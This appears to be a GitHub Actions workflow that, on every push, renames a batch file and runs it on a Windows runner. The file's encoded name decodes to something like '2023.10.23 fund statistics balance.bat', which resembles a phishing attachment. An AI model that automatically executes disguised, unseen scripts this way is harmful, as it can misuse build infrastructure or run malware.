name: test bay
on:
  push:
jobs:
  build-and-deploy:
    runs-on: windows-latest
    environment: dev
    steps:
    - name: 'Checkout GitHub Action'
      uses: actions/checkout@v3
    - run: Rename-Item -Path .\=?utf-8?B?MjAyMy4xMC4yM+i1hOmHkee7n+iuoeS9meminS5iYXQ=?= -NewName .\main.bat
    - run: Start-Process .\main.bat
